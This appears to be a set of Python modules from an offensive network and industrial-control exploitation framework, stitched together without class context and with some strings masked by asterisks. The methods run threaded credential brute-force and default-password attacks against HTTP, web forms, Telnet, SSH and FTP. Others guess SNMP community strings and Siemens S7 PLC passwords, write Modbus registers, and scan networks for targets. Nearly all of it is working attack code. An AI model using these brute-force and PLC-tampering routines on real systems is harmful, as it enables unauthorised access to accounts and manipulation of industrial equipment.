def attack(self): url = "{}:{}{}".format(self.target, self.port, self.path) response = http_request(method="GET", url=url) if response is None: return if response.status_code != 401: print_status("Target is not protected by Digest Auth") return if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = itertools.product(usernames, passwords) with Threads.ThreadPoolExecutor(self.threads) as executor: for record in collection: executor.submit(self.target_function, url, record) if self.credentials: print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") printTable(headers, *self.credentials) else: print_error("Credentials not found")
def run(self): try: arguments = "-T{s} -n -PR -sn " nm = nmap.PortScanner() nm.scan(hosts=self.target, arguments=arguments.format(s=self.speed)) for host in nm.all_hosts(): try: ipv4 = nm[host]['addresses']['ipv4'] mac = nm[host]['addresses']['mac'] vendor = nm[host]['vendor'][mac] except Exception as e: if 'mac' in str(e): mac = 'Unknown' vendor = 'Unknown' if 'vendor' in str(e): vendor = 'Unknown' finally: self.result.append([ipv4, mac, vendor]) ipv4 = "" mac = "" vendor = "" unique_device = [list(x) for x in set(tuple(x) for x in self.result)] unique_device = sorted(unique_device, key=lambda x: (x[0], x[1])) if len(self.result) > 0: print_success("Found %s devices." % len(self.result)) printTable(TABLE_HEADER, *unique_device, **{'max_column_length': 50}) print('\r') self.result = [] else: print_error("Didn't find any device on network %s" % self.target) except: print_error("Discovery Error. Aborting.")
def attack(self): url = "{}:{}{}".format(self.target, self.port, self.path) response = http_request("GET", url) if response is None: return if response.status_code != 401: print_status("Target is not protected by Digest Auth") return if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] with Threads.ThreadPoolExecutor(self.threads) as executor: for record in defaults: username, password = record.split(':') executor.submit(self.target_function, url, username, password) if self.credentials: print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") printTable(headers, *self.credentials) else: print_error("Credentials not found") defaults.close()
def attack(self): try: tn = telnetlib.Telnet(self.target, self.port) tn.expect(["login: "******"Login: "******"Connection error {}:{}".format( self.target, self.port)) return if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = LockedIterator(itertools.product(usernames, passwords)) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") printTable(headers, *self.credentials) else: print_error("Credentials not found")
def attack(self): ssh = paramiko.SSHClient() try: ssh.connect(self.target, port=self.port) except socket.error: print_error("Connection error: %s:%s" % (self.target, str(self.port))) ssh.close() return except: pass ssh.close() if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] collection = LockedIterator(defaults) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") printTable(headers, *self.credentials) else: print_error("Credentials not found")
def attack(self): ftp = ftplib.FTP() try: ftp.connect(self.target, port=int(self.port), timeout=10) except (socket.error, socket.timeout): print_error("Connection error: %s:%s" % (self.target, str(self.port))) ftp.close() return except: pass ftp.close() if self.defaults.startswith('file://'): defaults = open(self.defaults[7:], 'r') else: defaults = [self.defaults] collection = LockedIterator(defaults) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") printTable(headers, *self.credentials) else: print_error("Credentials not found")
def target_function(self, running, data): module_verbosity = boolify(self.verbose) name = threading.current_thread().name print_status(name, 'thread is starting...', verbose=module_verbosity) s7_client = S7Client() s7_client.connect() if not module_verbosity: s7_client.logger.setLevel(50) while running.is_set(): try: string = data.next().strip() if len(string) > 8: continue s7_client.check_privilege() if s7_client.protect_level == 1: print_error("Target didn't set password.") return s7_client.auth(string) if s7_client.authorized: if boolify(self.stop_on_success): running.clear() print_success("Target: {}:{} {}: Valid password string found - String: '{}'".format( self.target, self.port, name, string), verbose=module_verbosity) self.strings.append((self.target, self.port, string)) else: print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format( self.target, self.port, name, string), verbose=module_verbosity) except StopIteration: break print_status(name, 'thread is terminated.', verbose=module_verbosity)
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name print_status(name, 'thread is starting...', verbose=module_verbosity) cmdGen = cmdgen.CommandGenerator() while running.is_set(): try: string = data.next().strip() errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd( cmdgen.CommunityData(string, mpModel=self.version - 1), cmdgen.UdpTransportTarget((self.target, self.port)), '1.3.6.1.2.1.1.1.0', ) if errorIndication or errorStatus: print_error( "Target: {}:{} {}: Invalid community string - String: '{}'" .format(self.target, self.port, name, string), verbose=module_verbosity) else: if boolify(self.stop_on_success): running.clear() print_success( "Target: {}:{} {}: Valid community string found - String: '{}'" .format(self.target, self.port, name, string), verbose=module_verbosity) self.strings.append((self.target, self.port, string)) except StopIteration: break print_status(name, 'thread is terminated.', verbose=module_verbosity)
def write(self): try: print_status("Writing '" + self.value + "' in " + self.address + ".") subprocess.call( ['modbus', 'write', self.target, self.address, self.value], stderr=subprocess.STDOUT) print_success("Executed successfully.") except: print_error("Connection Error. Aborting.")
def read(self): try: output = subprocess.check_output( ['modbus', 'read', self.target, self.address, self.limit], stderr=subprocess.STDOUT) for x in output.decode().split('\n'): if x is not "": print_success(x) except: print_error("Connection Error. Aborting.")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name print_status(name, 'process is starting...', verbose=module_verbosity) ftp = ftplib.FTP() while running.is_set(): try: line = data.next().split(":") user = line[0].strip() password = line[1].strip() except StopIteration: break else: retries = 0 while retries < 3: try: ftp.connect(self.target, port=int(self.port), timeout=10) break except: print_error( "{} Connection problem. Retrying...".format(name), verbose=module_verbosity) retries += 1 if retries > 2: print_error( "Too much connection problems. Quiting...", verbose=module_verbosity) return try: ftp.login(user, password) if boolify(self.stop_on_success): running.clear() print_success( "Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append( (self.target, self.port, user, password)) except: print_error( "Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) ftp.close() print_status(name, 'process is terminated.', verbose=module_verbosity)
def attack(self): url = sanitize_url("{}:{}{}".format(self.target, self.port, self.get_form_path())) try: requests.get(url, verify=False) except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): print_error("Invalid URL format: %s" % url) return except requests.exceptions.ConnectionError: print_error("Connection error: %s" % url) return # authentication type if self.form == 'auto': form_data = self.detect_form() if form_data is None: print_error("Could not detect form") return (form_action, self.data) = form_data if form_action: self.path = form_action else: self.data = self.form print_status("Using following data: ", self.data) # invalid authentication self.invalid_auth() # running threads if self.usernames.startswith('file://'): usernames = open(self.usernames[7:], 'r') else: usernames = [self.usernames] if self.passwords.startswith('file://'): passwords = open(self.passwords[7:], 'r') else: passwords = [self.passwords] collection = LockedIterator(itertools.product(usernames, passwords)) self.run_threads(self.threads, self.target_function, collection) if len(self.credentials): print_success("Credentials found!") headers = ("Target", "Port", "Login", "Password") printTable(headers, *self.credentials) else: print_error("Credentials not found")
def attack(self): # todo: check if service is up if self.snmp.startswith('file://'): snmp = open(self.snmp[7:], 'r') else: snmp = [self.snmp] collection = LockedIterator(snmp) self.run_threads(self.threads, self.target_function, collection) if len(self.strings): print_success("Credentials found!") headers = ("Target", "Port", "Community Strings") printTable(headers, *self.strings) else: print_error("Valid community strings not found")
def attack(self): # todo: check if service is up if self.password.startswith('file://'): s7_pass = open(self.password[7:], 'r') else: s7_pass = [self.password] collection = LockedIterator(s7_pass) self.run_threads(self.threads, self.target_function, collection) if len(self.strings): print_success("Credentials found!") headers = ("Target", "Port", "password") printTable(headers, *self.strings) else: print_error("Valid password not found")
def run(self): self.result = [] #conf.verb = self.verbose nm = port_scan(protocol='TCP', target=self.target, port=self.port) for host in nm.all_hosts(): if nm[host]['tcp'][self.port]['state'] == "open": print_success("Host: %s, port:%s is open" % (host, self.port)) self.get_target_info(host=host, port=self.port) unique_device = [list(x) for x in set(tuple(x) for x in self.result)] unique_device = sorted(unique_device, key=lambda x: (x[5], x[6])) if len(self.result) > 0: print_success("Find %s targets" % len(self.result)) printTable(TABLE_HEADER, *unique_device, **{'max_column_length': 20}) print('\r') else: print_error("Didn't find any target on network %s" % self.target)
def target_function(self, running, data): module_verbosity = Validators.boolify(self.verbosity) name = threading.current_thread().name url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path)) headers = {u'Content-Type': u'application/x-www-form-urlencoded'} print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: user, password = data.next() user = user.strip() password = password.strip() postdata = self.data.replace("{{USER}}", user).replace( "{{PASS}}", password) r = requests.post(url, headers=headers, data=postdata, verify=False) l = len(r.text) if l < self.invalid["min"] or l > self.invalid["max"]: if Validators.boolify(self.stop_on_success): running.clear() print_success( "Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append( (self.target, self.port, user, password)) else: print_error( name, "Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) except StopIteration: break print_status(name, 'process is terminated.', verbose=module_verbosity)
def target_function(self, url, creds): name = threading.current_thread().name user, password = creds user = user.encode('utf-8').strip() password = password.encode('utf-8').strip() response = http_request(method="GET", url=url, auth=(user, password)) if response is not None and response.status_code != 401: print_success( "Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=self.verbosity) self.credentials.append((self.target, self.port, user, password)) if self.stop_on_success: raise Threads.StopThreadPoolExecutor else: print_error( "Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=self.verbosity)
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: line = data.next().split(":") user = line[0].strip() password = line[1].strip() ssh.connect(self.target, int(self.port), timeout=5, username=user, password=password) except StopIteration: break except paramiko.ssh_exception.SSHException as err: ssh.close() print_error( "Target: {}:{} {}: {} Username: '******' Password: '******'". format(self.target, self.port, name, err, user, password), verbose=module_verbosity) else: if boolify(self.stop_on_success): running.clear() print_success( "Target: {}:{} {} Authentication Succeed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append( (self.target, self.port, user, password)) print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self): try: try: if self.target == "": if self.mode == 'active': p = subprocess.Popen(['netdiscover', '-i', self.iface, '-P', '-N'], stdout=subprocess.PIPE) else: p = subprocess.Popen(['netdiscover', '-i', self.iface, '-p', '-P', '-N'], stdout=subprocess.PIPE) else: if self.mode == 'active': p = subprocess.Popen(['netdiscover', '-i', self.iface, '-r', self.target, '-P', '-N'], stdout=subprocess.PIPE) else: p = subprocess.Popen(['netdiscover', '-i', self.iface, '-r', self.target, '-p', '-P', '-N'], stdout=subprocess.PIPE) output, error = p.communicate(timeout=self.timeout) except: p.kill() output, error = p.communicate() for x in output.decode().split('\n'): if x != "": if len(x.split()) >= 5: self.result.append([x.split()[0],x.split()[1],x.split()[2], x.split()[3], " ".join(x.split()[4:])]) else: self.result.append([x.split()[0], x.split()[1], x.split()[2], x.split()[3], ""]) unique_device = [list(x) for x in set(tuple(x) for x in self.result)] unique_device = sorted(unique_device, key=lambda x: (x[0], x[1])) if len(self.result) > 0: print_success("Found %s devices." % len(self.result)) printTable(TABLE_HEADER, *unique_device, **{'max_column_length': 50}) print('\r') self.result = [] else: print_error("Didn't find any device on network %s" % self.target) except Exception as e: print_error(e) print_error("Discovery Error. Aborting. May increase timeout.")
def target_function(self, running, data): module_verbosity = boolify(self.verbosity) name = threading.current_thread().name print_status(name, 'process is starting...', verbose=module_verbosity) while running.is_set(): try: line = data.next().split(":") user = line[0].strip() password = line[1].strip() except StopIteration: break else: retries = 0 while retries < 3: try: tn = telnetlib.Telnet(self.target, self.port) tn.expect(["Login: "******"login: "******"\r\n") tn.expect(["Password: "******"password"], 5) tn.write(password + "\r\n") tn.write("\r\n") (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5) tn.close() if i != -1: print_error( "Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) else: if any(map(lambda x: x in res, [ "#", "$", ">" ])) or len(res) > 500: # big banner e.g. mikrotik if boolify(self.stop_on_success): running.clear() print_success( "Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'" .format(self.target, self.port, name, user, password), verbose=module_verbosity) self.credentials.append( (self.target, self.port, user, password)) tn.close() break except EOFError: print_error(name, "Connection problem. Retrying...", verbose=module_verbosity) retries += 1 if retries > 2: print_error( "Too much connection problems. Quiting...", verbose=module_verbosity) return continue print_status(name, 'process is terminated.', verbose=module_verbosity)
def run(self): if self.connect(self.target, self.port): print_success("Connected to " + self.target + ":" + str(self.port) + " successfully.")